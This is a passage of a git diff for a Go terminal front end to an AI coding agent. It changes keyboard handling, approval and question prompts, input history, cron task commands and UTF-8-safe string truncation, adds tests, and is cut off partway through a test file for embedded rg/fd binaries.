@@ -386,27 +412,27 @@ func (a *App) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
 
 	case tea.KeyMsg:
 		if a.toolModalOpen {
-			switch msg.String() {
-			case "esc", "ctrl+o", "q":
+			switch {
+			case msg.Type == tea.KeyEsc || msg.Type == tea.KeyCtrlO || (msg.Type == tea.KeyRunes && string(msg.Runes) == "q"):
 				a.closeToolModal()
 				return a, nil
-			case "up":
+			case msg.Type == tea.KeyUp:
 				a.scrollToolModal(-1)
 				return a, nil
-			case "down":
+			case msg.Type == tea.KeyDown:
 				a.scrollToolModal(1)
 				return a, nil
-			case "pgup":
+			case msg.Type == tea.KeyPgUp:
 				a.scrollToolModal(-a.toolModalPageSize())
 				return a, nil
-			case "pgdown":
+			case msg.Type == tea.KeyPgDown:
 				a.scrollToolModal(a.toolModalPageSize())
 				return a, nil
-			case "home":
+			case msg.Type == tea.KeyHome:
 				a.toolModalOffset = 0
 				a.toolModalPinnedBottom = false
 				return a, nil
-			case "end":
+			case msg.Type == tea.KeyEnd:
 				a.toolModalOffset = a.maxToolModalOffset()
 				a.toolModalPinnedBottom = true
 				return a, nil
@@ -415,30 +441,34 @@ func (a *App) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
 		}
 
 		// Special keys are processed immediately; regular text input is batched.
-		switch msg.String() {
-		case "ctrl+c":
+		switch msg.Type {
+		case tea.KeyCtrlC:
 			return a, tea.Quit
-		case "esc":
-			if a.isThinking {
+		case tea.KeyEsc:
+			if a.isThinking || a.waitingForApproval || a.waitingForQuestion {
 				if a.agent != nil {
 					a.agent.Abort()
 					a.agent = nil // Reset agent so next request creates a fresh one with new abort channel
 					a.agentHistoryLoaded = false
 				}
+				a.clearApprovalState()
+				a.clearQuestionState()
 				a.inputQueueMu.Lock()
 				a.inputQueue = a.inputQueue[:0]
 				a.lastInputTime = time.Time{}
 				a.inputQueueMu.Unlock()
 				a.input.Reset()
+				a.resetInputHistoryNavigation()
 				a.isThinking = false
 				a.finishRequestTimer()
 				a.addMessage(statusStyle.Render("⏹ Aborted"))
 				return a, a.timer.Stop()
 			} else {
 				a.input.Reset()
+				a.resetInputHistoryNavigation()
 			}
 			return a, nil
-		case "enter":
+		case tea.KeyEnter:
 			// Process enter immediately
 			a.flushInputQueue()
 			input := strings.TrimSpace(a.input.Value())
@@ -462,31 +492,75 @@ func (a *App) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
 					a.pendingApprovalID = ""
 				}
 				a.input.Reset()
+				a.resetInputHistoryNavigation()
+				a.scheduleRender()
+				return a, nil
+			}
+
+			// Check if waiting for a question
+			if a.waitingForQuestion {
+				if a.agent != nil {
+					answer := strings.TrimSpace(input)
+					// Check if it's a number selection
+					var num int
+					if _, err := fmt.Sscanf(answer, "%d", &num); err == nil && num > 0 {
+						// Find the question to resolve options
+						// Options are already shown; just pass the number as the answer
+						a.agent.HandleQuestionResponse(a.pendingQuestionID, answer)
+						a.addMessage(statusStyle.Render(fmt.Sprintf("✅ Selected: [%s]", answer)))
+					} else if answer != "" {
+						// Custom text input
+						a.agent.HandleQuestionResponse(a.pendingQuestionID, answer)
+						a.addMessage(statusStyle.Render(fmt.Sprintf("✅ Answer: %s", answer)))
+					} else {
+						// Empty input — re-prompt
+						a.input.Reset()
+						a.resetInputHistoryNavigation()
+						a.scheduleRender()
+						return a, nil
+					}
+				}
+				// Show next queued question or clear waiting state
+				if len(a.questionQueue) > 0 {
+					a.showNextQuestion()
+				} else {
+					a.waitingForQuestion = false
+					a.pendingQuestionID = ""
+				}
+				a.input.Reset()
+				a.resetInputHistoryNavigation()
 				a.scheduleRender()
 				return a, nil
 			}
 
 			if input != "" {
 				a.input.Reset()
+				a.recordInputHistory(input)
 				expandedInput := a.expandPasteMarkers(input)
 				return a, a.processInput(expandedInput)
 			}
 			return a, nil
-		case "tab":
+		case tea.KeyTab:
 			a.cycleMode()
 			return a, nil
-		case "pgup":
+		case tea.KeyPgUp:
 			return a, nil
-		case "pgdown":
+		case tea.KeyPgDown:
 			return a, nil
-		case "home":
-			return a, nil
-		case "end":
-			return a, nil
-		case "ctrl+o":
+		case tea.KeyUp:
+			a.flushInputQueue()
+			if a.navigateInputHistory(-1) {
+				return a, nil
+			}
+		case tea.KeyDown:
+			a.flushInputQueue()
+			if a.navigateInputHistory(1) {
+				return a, nil
+			}
+		case tea.KeyCtrlO:
 			a.openLatestToolModal()
 			return a, nil
-		case "ctrl+p":
+		case tea.KeyCtrlP:
 			a.toggleMultiAgent()
 			return a, nil
 		}
@@ -501,6 +575,7 @@ func (a *App) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
 		}
 
 		a.queueInput(msg)
+		a.resetInputHistoryNavigation()
 		return a, nil
 
 	case agentStartMsg:
@@ -783,4 +858,3 @@ func (a *App) markAssistantRenderedDirty() {
 // Message types
 type agentStartMsg struct{ input string }
 type renderRequestMsg struct{}
-
diff --git a/internal/tui/approval.go b/internal/tui/approval.go
index 097abf9..b52aac5 100644
--- a/internal/tui/approval.go
+++ b/internal/tui/approval.go
@@ -19,15 +19,64 @@ func (a *App) showNextApproval() {
 	a.approvalQueue = a.approvalQueue[1:]
 	a.pendingApprovalID = next.approvalID
 	a.waitingForApproval = true
+
+	// Build all lines into one message to preserve order.
+	var sb strings.Builder
 	if len(a.approvalQueue) > 0 {
-		a.addMessage(warningStyle.Render(fmt.Sprintf("⚠️  Approval required for [%s] (%d more pending)", next.toolName, len(a.approvalQueue))))
+		sb.WriteString(warningStyle.Render(fmt.Sprintf("⚠️  Approval required for [%s] (%d more pending)", next.toolName, len(a.approvalQueue))))
 	} else {
-		a.addMessage(warningStyle.Render(fmt.Sprintf("⚠️  Approval required for [%s]", next.toolName)))
+		sb.WriteString(warningStyle.Render(fmt.Sprintf("⚠️  Approval required for [%s]", next.toolName)))
 	}
+	sb.WriteByte('\n')
 	if len(next.args) > 0 {
-		a.addMessage(warningStyle.Render(formatApprovalArgs(next.toolName, next.args)))
+		sb.WriteString(warningStyle.Render(formatApprovalArgs(next.toolName, next.args)))
+		sb.WriteByte('\n')
+	}
+	sb.WriteString(warningStyle.Render("Approve? (y/n): "))
+	a.addMessage(sb.String())
+}
+
+func (a *App) clearApprovalState() {
+	a.waitingForApproval = false
+	a.pendingApprovalID = ""
+	a.approvalQueue = a.approvalQueue[:0]
+}
+
+// showNextQuestion pops the next question request from the queue and displays it.
+func (a *App) showNextQuestion() {
+	if len(a.questionQueue) == 0 {
+		a.waitingForQuestion = false
+		a.pendingQuestionID = ""
+		return
+	}
+	next := a.questionQueue[0]
+	a.questionQueue = a.questionQueue[1:]
+	a.pendingQuestionID = next.questionID
+	a.waitingForQuestion = true
+
+	// Build all lines into one message to preserve order (addMessage uses
+	// async goroutines, so multiple calls can interleave).
+	var sb strings.Builder
+	if next.context != "" {
+		sb.WriteString(warningStyle.Render("💬 " + next.context))
+		sb.WriteByte('\n')
 	}
-	a.addMessage(warningStyle.Render("Approve? (y/n): "))
+	sb.WriteString(warningStyle.Render("❓ " + next.question))
+	sb.WriteByte('\n')
+	for i, opt := range next.options {
+		sb.WriteString(statusStyle.Render(fmt.Sprintf("  [%d] %s", i+1, opt)))
+		sb.WriteByte('\n')
+	}
+	sb.WriteString(statusStyle.Render(fmt.Sprintf("  [%d] ✍️  Custom input", len(next.options)+1)))
+	sb.WriteByte('\n')
+	sb.WriteString(warningStyle.Render("Enter number or custom text: "))
+	a.addMessage(sb.String())
+}
+
+func (a *App) clearQuestionState() {
+	a.waitingForQuestion = false
+	a.pendingQuestionID = ""
+	a.questionQueue = a.questionQueue[:0]
 }
 
 func formatApprovalArgs(toolName string, args map[string]any) string {
diff --git a/internal/tui/cache_test.go b/internal/tui/cache_test.go
index 4ce13c2..847664d 100644
--- a/internal/tui/cache_test.go
+++ b/internal/tui/cache_test.go
@@ -131,7 +131,7 @@ func TestLiveAssistantMessageDoesNotRenderMarkdown(t *testing.T) {
 }
 
 func TestViewClampsLiveContentToKeepInputVisible(t *testing.T) {
-	app := NewApp(nil, &provider.Model{Name: "test"}, config.DefaultSettings(), nil, nil, "", "", nil, "agent", false, nil)
+	app := NewApp(nil, &provider.Model{Name: "test"}, config.DefaultSettings(), nil, nil, "", "", nil, "agent", false, nil, nil, nil)
 	app.ready = true
 	app.width = 80
 	app.height = 8
@@ -548,6 +548,123 @@ func teaKeyMsgForTest(s string) tea.KeyMsg {
 	return tea.KeyMsg{Type: tea.KeyRunes, Runes: []rune(s)}
 }
 
+func teaSpecialKeyMsgForTest(key tea.KeyType) tea.KeyMsg {
+	return tea.KeyMsg{Type: key}
+}
+
+func TestInputHomeEndKeysReachTextInput(t *testing.T) {
+	a := NewApp(nil, &provider.Model{Name: "test"}, config.DefaultSettings(), nil, nil, "", "", nil, "agent", false, nil, nil, nil)
+	a.input.SetValue("abc")
+
+	a.Update(teaSpecialKeyMsgForTest(tea.KeyHome))
+	a.flushInputQueue()
+	a.Update(teaKeyMsgForTest("X"))
+	a.flushInputQueue()
+
+	if got := a.input.Value(); got != "Xabc" {
+		t.Fatalf("value after home insert = %q, want Xabc", got)
+	}
+
+	a.Update(teaSpecialKeyMsgForTest(tea.KeyEnd))
+	a.flushInputQueue()
+	a.Update(teaKeyMsgForTest("Z"))
+	a.flushInputQueue()
+
+	if got := a.input.Value(); got != "XabcZ" {
+		t.Fatalf("value after end insert = %q, want XabcZ", got)
+	}
+}
+
+func TestInputHistoryNavigationPreservesDraft(t *testing.T) {
+	a := NewApp(nil, &provider.Model{Name: "test"}, config.DefaultSettings(), nil, nil, "", "", nil, "agent", false, nil, nil, nil)
+	a.recordInputHistory("first")
+	a.recordInputHistory("second")
+	a.input.SetValue("draft")
+
+	if !a.navigateInputHistory(-1) || a.input.Value() != "second" {
+		t.Fatalf("first up value = %q, want second", a.input.Value())
+	}
+	if !a.navigateInputHistory(-1) || a.input.Value() != "first" {
+		t.Fatalf("second up value = %q, want first", a.input.Value())
+	}
+	if !a.navigateInputHistory(-1) || a.input.Value() != "first" {
+		t.Fatalf("third up value = %q, want first", a.input.Value())
+	}
+	if !a.navigateInputHistory(1) || a.input.Value() != "second" {
+		t.Fatalf("first down value = %q, want second", a.input.Value())
+	}
+	if !a.navigateInputHistory(1) || a.input.Value() != "draft" {
+		t.Fatalf("second down value = %q, want draft", a.input.Value())
+	}
+	if a.navigateInputHistory(1) {
+		t.Fatal("down outside history returned true, want false")
+	}
+}
+
+func TestInputHistoryNavigationFlushesQueuedDraft(t *testing.T) {
+	a := NewApp(nil, &provider.Model{Name: "test"}, config.DefaultSettings(), nil, nil, "", "", nil, "agent", false, nil, nil, nil)
+	a.recordInputHistory("previous")
+
+	a.Update(teaKeyMsgForTest("draft"))
+	a.Update(teaSpecialKeyMsgForTest(tea.KeyUp))
+
+	if got := a.input.Value(); got != "previous" {
+		t.Fatalf("up value = %q, want previous", got)
+	}
+
+	a.Update(teaSpecialKeyMsgForTest(tea.KeyDown))
+	if got := a.input.Value(); got != "draft" {
+		t.Fatalf("down value = %q, want queued draft restored", got)
+	}
+}
+
+func TestEscAbortClearsApprovalState(t *testing.T) {
+	a := NewApp(nil, &provider.Model{Name: "test"}, config.DefaultSettings(), nil, nil, "", "", nil, "agent", false, nil, nil, nil)
+	a.isThinking = true
+	a.waitingForApproval = true
+	a.pendingApprovalID = "approval-1"
+	a.approvalQueue = []pendingApproval{{approvalID: "approval-2", toolName: "bash"}}
+
+	a.Update(teaSpecialKeyMsgForTest(tea.KeyEsc))
+
+	if a.waitingForApproval {
+		t.Fatal("waitingForApproval = true, want false")
+	}
+	if a.pendingApprovalID != "" {
+		t.Fatalf("pendingApprovalID = %q, want empty", a.pendingApprovalID)
+	}
+	if len(a.approvalQueue) != 0 {
+		t.Fatalf("len(approvalQueue) = %d, want 0", len(a.approvalQueue))
+	}
+}
+
+func TestRuneInputTabDoesNotCycleMode(t *testing.T) {
+	a := NewApp(nil, &provider.Model{Name: "test"}, config.DefaultSettings(), nil, nil, "", "", nil, "agent", false, nil, nil, nil)
+	a.input.SetValue("prefix ")
+
+	a.Update(teaKeyMsgForTest("tab"))
+	a.flushInputQueue()
+
+	if got := a.mode; got != "agent" {
+		t.Fatalf("mode = %q, want agent", got)
+	}
+	if got := a.input.Value(); got != "prefix tab" {
+		t.Fatalf("input = %q, want %q", got, "prefix tab")
+	}
+}
+
+func TestRuneInputEscDoesNotAbortOrClearInput(t *testing.T) {
+	a := NewApp(nil, &provider.Model{Name: "test"}, config.DefaultSettings(), nil, nil, "", "", nil, "agent", false, nil, nil, nil)
+	a.input.SetValue("prefix ")
+
+	a.Update(teaKeyMsgForTest("esc"))
+	a.flushInputQueue()
+
+	if got := a.input.Value(); got != "prefix esc" {
+		t.Fatalf("input = %q, want %q", got, "prefix esc")
+	}
+}
+
 func TestInitWithProgramDoesNotBlock(t *testing.T) {
 	a := NewApp(
 		&historyInjectMockProvider{},
@@ -561,6 +678,8 @@ func TestInitWithProgramDoesNotBlock(t *testing.T) {
 		"agent",
 		false,
 		nil,
+		nil,
+		nil,
 	)
 	a.SetInitialMessage("hello")
 	p := tea.NewProgram(a)
@@ -717,6 +836,8 @@ func TestInitThenProcessInputStillInjectsSessionHistory(t *testing.T) {
 		"agent",
 		false,
 		nil,
+		nil,
+		nil,
 	)
 
 	// Simulate real startup flow: Init() loads history into UI and flips historyLoaded.
diff --git a/internal/tui/commands.go b/internal/tui/commands.go
index 84a7025..16a76fc 100644
--- a/internal/tui/commands.go
+++ b/internal/tui/commands.go
@@ -11,6 +11,7 @@ import (
 
 	agentpkg "github.com/startvibecoding/vibecoding/agent"
 	"github.com/startvibecoding/vibecoding/internal/config"
+	"github.com/startvibecoding/vibecoding/internal/cron"
 	"github.com/startvibecoding/vibecoding/internal/session"
 )
 
@@ -132,6 +133,10 @@ func (a *App) handleCronCommand(parts []string) {
 		a.addMessage(errorStyle.Render("Cron commands require multi-agent mode. Use Ctrl+P to toggle."))
 		return
 	}
+	if a.cronStore == nil {
+		a.addMessage(errorStyle.Render("Cron store not initialized."))
+		return
+	}
 	if len(parts) < 2 {
 		a.addMessage(statusStyle.Render("Usage: /cron add|list|enable|disable|remove|run"))
 		return
@@ -143,34 +148,94 @@ func (a *App) handleCronCommand(parts []string) {
 			return
 		}
 		desc := strings.Join(parts[2:], " ")
-		a.addMessage(statusStyle.Render(fmt.Sprintf("Cron task added: %s", desc)))
-		a.addMessage(statusStyle.Render("  (Full cron integration will be available with LLM parsing)"))
+		job, err := a.cronStore.Create(cron.CronJob{
+			Name:    desc,
+			Prompt:  desc,
+			Enabled: true,
+			Mode:    a.mode,
+		})
+		if err != nil {
+			a.addMessage(errorStyle.Render(fmt.Sprintf("Failed to create cron task: %v", err)))
+			return
+		}
+		a.addMessage(statusStyle.Render(fmt.Sprintf("✅ Cron task created: %s (id: %s)", job.Name, job.ID)))
 	case "list":
-		a.addMessage(statusStyle.Render("Cron tasks: (none configured)"))
+		jobs, err := a.cronStore.List()
+		if err != nil {
+			a.addMessage(errorStyle.Render(fmt.Sprintf("Failed to list cron tasks: %v", err)))
+			return
+		}
+		if len(jobs) == 0 {
+			a.addMessage(statusStyle.Render("Cron tasks: (none configured)"))
+			return
+		}
+		var sb strings.Builder
+		sb.WriteString(fmt.Sprintf("Cron tasks (%d):\n", len(jobs)))
+		for _, j := range jobs {
+			status := "✅"
+			if !j.Enabled {
+				status = "⏸"
+			}
+			if j.LastStatus == "failed" {
+				status = "❌"
+			}
+			sb.WriteString(fmt.Sprintf("  %s [%s] %s (runs: %d)\n", status, j.ID, j.Name, j.RunCount))
+		}
+		a.addMessage(statusStyle.Render(sb.String()))
 	case "enable":
 		if len(parts) < 3 {
 			a.addMessage(statusStyle.Render("Usage: /cron enable <id>"))
 			return
 		}
-		a.addMessage(statusStyle.Render(fmt.Sprintf("Cron task %s enabled", parts[2])))
+		job, err := a.cronStore.Get(parts[2])
+		if err != nil {
+			a.addMessage(errorStyle.Render(fmt.Sprintf("%v", err)))
+			return
+		}
+		job.Enabled = true
+		a.cronStore.Update(*job)
+		a.addMessage(statusStyle.Render(fmt.Sprintf("✅ Cron task %s enabled", job.ID)))
 	case "disable":
 		if len(parts) < 3 {
 			a.addMessage(statusStyle.Render("Usage: /cron disable <id>"))
 			return
 		}
-		a.addMessage(statusStyle.Render(fmt.Sprintf("Cron task %s disabled", parts[2])))
+		job, err := a.cronStore.Get(parts[2])
+		if err != nil {
+			a.addMessage(errorStyle.Render(fmt.Sprintf("%v", err)))
+			return
+		}
+		job.Enabled = false
+		a.cronStore.Update(*job)
+		a.addMessage(statusStyle.Render(fmt.Sprintf("⏸ Cron task %s disabled", job.ID)))
 	case "remove":
 		if len(parts) < 3 {
 			a.addMessage(statusStyle.Render("Usage: /cron remove <id>"))
 			return
 		}
-		a.addMessage(statusStyle.Render(fmt.Sprintf("Cron task %s removed", parts[2])))
+		if err := a.cronStore.Delete(parts[2]); err != nil {
+			a.addMessage(errorStyle.Render(fmt.Sprintf("%v", err)))
+			return
+		}
+		a.addMessage(statusStyle.Render(fmt.Sprintf("🗑 Cron task %s removed", parts[2])))
 	case "run":
 		if len(parts) < 3 {
 			a.addMessage(statusStyle.Render("Usage: /cron run <id>"))
 			return
 		}
-		a.addMessage(statusStyle.Render(fmt.Sprintf("Cron task %s triggered", parts[2])))
+		job, err := a.cronStore.Get(parts[2])
+		if err != nil {
+			a.addMessage(errorStyle.Render(fmt.Sprintf("%v", err)))
+			return
+		}
+		if a.scheduler == nil {
+			a.addMessage(errorStyle.Render("Scheduler not running."))
+			return
+		}
+		// Trigger immediate run by resetting LastRun
+		job.LastRun = time.Time{}
+		a.cronStore.Update(*job)
+		a.addMessage(statusStyle.Render(fmt.Sprintf("▶ Cron task %s triggered (will run on next scheduler tick)", job.ID)))
 	default:
 		a.addMessage(errorStyle.Render(fmt.Sprintf("Unknown cron command: %s", parts[1])))
 	}
@@ -270,6 +335,22 @@ func (a *App) handleCommand(cmd string) tea.Cmd {
 		} else {
 			a.listSkills()
 		}
+	case "/compact":
+		if a.agent == nil {
+			a.addMessage(errorStyle.Render("Nothing to compact: no active conversation."))
+		} else {
+			msgs := a.agent.GetMessages()
+			if len(msgs) < 2 {
+				a.addMessage(errorStyle.Render("Nothing to compact: conversation is too short."))
+			} else {
+				a.agent.SetForceCompact()
+				if usage := a.agent.GetContextUsage(); usage != nil && usage.Percent != nil {
+					a.addMessage(statusStyle.Render(fmt.Sprintf("✅ Context compaction will be triggered on the next message. (current: %d tokens, %.0f%% used)", usage.Tokens, *usage.Percent)))
+				} else {
+					a.addMessage(statusStyle.Render("✅ Context compaction will be triggered on the next message."))
+				}
+			}
+		}
 	case "/clear":
 		a.messages = nil
 		a.agent = nil
@@ -303,6 +384,7 @@ func (a *App) handleCommand(cmd string) tea.Cmd {
 		a.addMessage(statusStyle.Render("  /skills                 - List available skills"))
 		a.addMessage(statusStyle.Render("  /skill <name>           - Activate a skill"))
 		a.addMessage(statusStyle.Render("  /clear                  - Clear conversation"))
+		a.addMessage(statusStyle.Render("  /compact                - Trigger context compaction"))
 		a.addMessage(statusStyle.Render("  /sessions               - List sessions for this project"))
 		a.addMessage(statusStyle.Render("  /sessions ls            - List sessions"))
 		a.addMessage(statusStyle.Render("  /sessions set <id>      - Switch to session"))
@@ -772,7 +854,7 @@ func (a *App) sessionsDel(id string) {
 		return
 	}
 
-	if err := session.DeleteSession(match.Path); err != nil {
+	if err := session.DeleteSession(match.Path, a.settings.GetSessionDir()); err != nil {
 		a.addMessage(errorStyle.Render(fmt.Sprintf("Error deleting session: %v", err)))
 		return
 	}
diff --git a/internal/tui/formatters.go b/internal/tui/formatters.go
index 73febef..6e66890 100644
--- a/internal/tui/formatters.go
+++ b/internal/tui/formatters.go
@@ -8,6 +8,7 @@ import (
 	"time"
 
 	"github.com/startvibecoding/vibecoding/internal/tools"
+	"github.com/startvibecoding/vibecoding/internal/util"
 )
 
 func planStatusMarker(status string) string {
@@ -258,11 +259,28 @@ func minInt(a, b int) int {
 	return b
 }
 
-func truncate(s string, maxLen int) string {
-	if len(s) <= maxLen {
-		return s
+// compactBashOutput compresses bash tool output for summary display by removing blank lines.
+func compactBashOutput(s string) string {
+	var sb strings.Builder
+	prevBlank := false
+	for _, line := range strings.Split(s, "\n") {
+		trimmed := strings.TrimSpace(line)
+		if trimmed == "" {
+			if !prevBlank {
+				sb.WriteString("\n")
+			}
+			prevBlank = true
+			continue
+		}
+		prevBlank = false
+		sb.WriteString(line)
+		sb.WriteString("\n")
 	}
-	return s[:maxLen] + "..."
+	return strings.TrimSpace(sb.String())
+}
+
+func truncate(s string, maxLen int) string {
+	return util.TruncateWithSuffix(s, maxLen, "...")
 }
 
 func formatDuration(d time.Duration) string {
diff --git a/internal/tui/input.go b/internal/tui/input.go
index f052eaf..1383046 100644
--- a/internal/tui/input.go
+++ b/internal/tui/input.go
@@ -134,6 +134,71 @@ func (a *App) cycleMode() {
 	a.addMessage(statusStyle.Render(fmt.Sprintf("Mode: %s", modeLabel)))
 }
 
+func (a *App) recordInputHistory(input string) {
+	input = strings.TrimSpace(input)
+	if input == "" {
+		return
+	}
+	if len(a.inputHistory) > 0 && a.inputHistory[len(a.inputHistory)-1] == input {
+		a.resetInputHistoryNavigation()
+		return
+	}
+	a.inputHistory = append(a.inputHistory, input)
+	const maxInputHistory = 200
+	if len(a.inputHistory) > maxInputHistory {
+		a.inputHistory = a.inputHistory[len(a.inputHistory)-maxInputHistory:]
+	}
+	a.resetInputHistoryNavigation()
+}
+
+func (a *App) navigateInputHistory(direction int) bool {
+	if a.waitingForApproval || len(a.inputHistory) == 0 {
+		return false
+	}
+
+	switch {
+	case direction < 0:
+		if !a.inputHistoryBrowsing {
+			a.inputHistoryDraft = a.input.Value()
+			a.inputHistoryIndex = len(a.inputHistory) - 1
+			a.inputHistoryBrowsing = true
+		} else if a.inputHistoryIndex > 0 {
+			a.inputHistoryIndex--
+		}
+	case direction > 0:
+		if !a.inputHistoryBrowsing {
+			return false
+		}
+		if a.inputHistoryIndex < len(a.inputHistory)-1 {
+			a.inputHistoryIndex++
+		} else {
+			a.inputHistoryBrowsing = false
+			a.inputHistoryIndex = 0
+			a.input.SetValue(a.inputHistoryDraft)
+			a.input.CursorEnd()
+			a.inputHistoryDraft = ""
+			a.scheduleRender()
+			return true
+		}
+	default:
+		return false
+	}
+
+	if a.inputHistoryIndex >= 0 && a.inputHistoryIndex < len(a.inputHistory) {
+		a.input.SetValue(a.inputHistory[a.inputHistoryIndex])
+		a.input.CursorEnd()
+		a.scheduleRender()
+		return true
+	}
+	return false
+}
+
+func (a *App) resetInputHistoryNavigation() {
+	a.inputHistoryBrowsing = false
+	a.inputHistoryIndex = 0
+	a.inputHistoryDraft = ""
+}
+
 func (a *App) processInput(input string) tea.Cmd {
 	if strings.HasPrefix(input, "/") {
 		return a.handleCommand(input)
diff --git a/internal/util/truncate.go b/internal/util/truncate.go
new file mode 100644
index 0000000..2b59e32
--- /dev/null
+++ b/internal/util/truncate.go
@@ -0,0 +1,30 @@
+package util
+
+// TruncateString returns a valid UTF-8 prefix of s whose byte length is at most maxBytes.
+func TruncateString(s string, maxBytes int) string {
+	if maxBytes <= 0 {
+		return ""
+	}
+	if len(s) <= maxBytes {
+		return s
+	}
+	end := 0
+	for idx := range s {
+		if idx > maxBytes {
+			break
+		}
+		end = idx
+	}
+	if end == 0 {
+		return ""
+	}
+	return s[:end]
+}
+
+// TruncateWithSuffix truncates s with TruncateString and appends suffix when truncation occurs.
+func TruncateWithSuffix(s string, maxBytes int, suffix string) string {
+	if len(s) <= maxBytes {
+		return s
+	}
+	return TruncateString(s, maxBytes) + suffix
+}
diff --git a/internal/util/truncate_test.go b/internal/util/truncate_test.go
new file mode 100644
index 0000000..9582516
--- /dev/null
+++ b/internal/util/truncate_test.go
@@ -0,0 +1,27 @@
+package util
+
+import (
+	"strings"
+	"testing"
+	"unicode/utf8"
+)
+
+func TestTruncateStringKeepsValidUTF8(t *testing.T) {
+	got := TruncateString("你好世界", 5)
+	if !utf8.ValidString(got) {
+		t.Fatalf("invalid UTF-8: %q", got)
+	}
+	if got != "你" {
+		t.Fatalf("got %q, want 你", got)
+	}
+}
+
+func TestTruncateWithSuffix(t *testing.T) {
+	got := TruncateWithSuffix("hello world", 5, "...")
+	if got != "hello..." {
+		t.Fatalf("got %q, want hello...", got)
+	}
+	if strings.ContainsRune(TruncateWithSuffix("🙂🙂", 5, "..."), utf8.RuneError) {
+		t.Fatal("truncated string contains replacement rune")
+	}
+}
diff --git a/internal/vendored/embed_unsupported.go b/internal/vendored/embed_unsupported.go
new file mode 100644
index 0000000..a3e7aa8
--- /dev/null
+++ b/internal/vendored/embed_unsupported.go
@@ -0,0 +1,6 @@
+//go:build !((linux && (amd64 || arm64)) || (darwin && (amd64 || arm64)) || (windows && (amd64 || arm64)))
+
+package vendored
+
+var rgData []byte
+var fdData []byte
diff --git a/internal/vendored/vendored.go b/internal/vendored/vendored.go
index 763b176..d3d2877 100644
--- a/internal/vendored/vendored.go
+++ b/internal/vendored/vendored.go
@@ -1,6 +1,7 @@
 package vendored
 
 import (
+	"errors"
 	"fmt"
 	"os"
 	"path/filepath"
@@ -10,6 +11,14 @@ import (
 // rgData 和 fdData 由各平台的 embed_*.go 文件定义
 // 通过 go:embed 嵌入对应的二进制数据
 
+// ErrUnsupportedPlatform indicates that rg/fd are not embedded for this target.
+var ErrUnsupportedPlatform = errors.New("vendored rg/fd unsupported for current platform")
+
+// HasEmbeddedTools reports whether the current target has embedded rg/fd data.
+func HasEmbeddedTools() bool {
+	return len(rgData) > 0 && len(fdData) > 0
+}
+
 // binDir 返回 ~/.vibecoding/bin/ 目录路径
 func binDir() (string, error) {
 	home, err := os.UserHomeDir()
@@ -22,6 +31,10 @@ func binDir() (string, error) {
 // Ensure 确保 rg 和 fd 已解压到 ~/.vibecoding/bin/
 // 首次运行时从嵌入数据写入，后续跳过
 func Ensure() error {
+	if !HasEmbeddedTools() {
+		return fmt.Errorf("%w: %s-%s", ErrUnsupportedPlatform, runtime.GOOS, runtime.GOARCH)
+	}
+
 	dir, err := binDir()
 	if err != nil {
 		return err
diff --git a/internal/vendored/vendored_test.go b/internal/vendored/vendored_test.go
new file mode 100644
index 0000000..610bdae
--- /dev/null
+++ b/internal/vendored/vendored_test.go
@@ -0,0 +1,232 @@
+package vendored
+
+import (
+	"os"
+	"path/filepath"
+	"runtime"
+	"testing"
+)
+
+// withTempHome sets HOME (or USERPROFILE on Windows) to a temp dir for the
+// duration of the test so that binDir() / Ensure() / RgPath() / FdPath()
+// don't touch the real ~/.vibecoding/bin/.
+func withTempHome(t *testing.T) string {
+	t.Helper()
+	dir := t.TempDir()
+	if runtime.GOOS == "windows" {
+		t.Setenv("USERPROFILE", dir)
+	} else {
+		t.Setenv("HOME", dir)
+	}
+	return dir
+}
+
+// --- binDir ---
+
+func TestBinDir(t *testing.T) {
+	home := withTempHome(t)
+	dir, err := binDir()
+	if err != nil {
+		t.Fatalf("binDir: %v", err)
+	}
+	want := filepath.Join(home, ".vibecoding", "bin")
+	if dir != want {
+		t.Errorf("binDir = %q, want %q", dir, want)
+	}
+}
+
+// --- extractBinary ---
+
+func TestExtractBinary_EmptyData(t *testing.T) {
+	dest := filepath.Join(t.TempDir(), "empty")
+	err := extractBinary(dest, nil)
+	if err == nil {
+		t.Fatal("expected error for empty data")
+	}
+}
+
+func TestExtractBinary_WritesNew(t *testing.T) {
+	dest := filepath.Join(t.TempDir(), "bin")
+	data := []byte("#!/bin/sh\necho hello\n")
+	if err := extractBinary(dest, data); err != nil {
+		t.Fatalf("extractBinary: %v", err)
+	}
+	// Verify file written
+	info, err := os.Stat(dest)
+	if err != nil {
+		t.Fatalf("stat: %v", err)
+	}
+	if info.Size() != int64(len(data)) {
+		t.Errorf("size = %d, want %d", info.Size(), len(data))
+	}
+	// Verify executable
+	if runtime.GOOS != "windows" {
+		if info.Mode()&0o111 == 0 {
+			t.Error("file should be executable")
+		}
+	}
+}
+
+func TestExtractBinary_SkipsSameSize(t *testing.T) {
+	dir := t.TempDir()
+	dest := filepath.Join(dir, "bin")
+	data := []byte("hello")
+
+	// First write
+	if err := extractBinary(dest, data); err != nil {
+		t.Fatalf("first write: %v", err)
+	}
+	info1, _ := os.Stat(dest)
+	modTime1 := info1.ModTime()
+
+	// Second write — should skip (same size)
+	if err := extractBinary(dest, data); err != nil {
+		t.Fatalf("second write: %v", err)
+	}
+	info2, _ := os.Stat(dest)
+	if info2.ModTime() != modTime1 {
+		t.Error("file should not be rewritten when size matches")
+	}
+}
+
+func TestExtractBinary_RewritesDifferentSize(t *testing.T) {
+	dir := t.TempDir()
+	dest := filepath.Join(dir, "bin")
+
+	// Write v1
+	if err := extractBinary(dest, []byte("v1")); err != nil {
+		t.Fatalf("v1: %v", err)
+	}
+	// Write v2 (different size)
+	v2 := []byte("version2")
+	if err := extractBinary(dest, v2); err != nil {
+		t.Fatalf("v2: %v", err)
+	}
+	got, _ := os.ReadFile(dest)
+	if string(got) != string(v2) {
+		t.Errorf("content = %q, want %q", got, v2)
+	}
+}
+
+func TestExtractBinary_FixesPermissions(t *testing.T) {
+	if runtime.GOOS == "windows" {
+		t.Skip("permission test not applicable on Windows")
+	}
+	dir := t.TempDir()
+	dest := filepath.Join(dir, "bin")
+	data := []byte("test")
+
+	// Write file without execute permission
+	os.WriteFile(dest, data, 0o644)
+
+	// extractBinary should fix permissions
+	if err := extractBinary(dest, data); err != nil {
+		t.Fatalf("extractBinary: %v", err)
+	}
+	info, _ := os.Stat(dest)
+	if info.Mode()&0o111 == 0 {
+		t.Error("extractBinary should fix execute permission")
+	}
+}
+
+// --- RgPath / FdPath ---
+
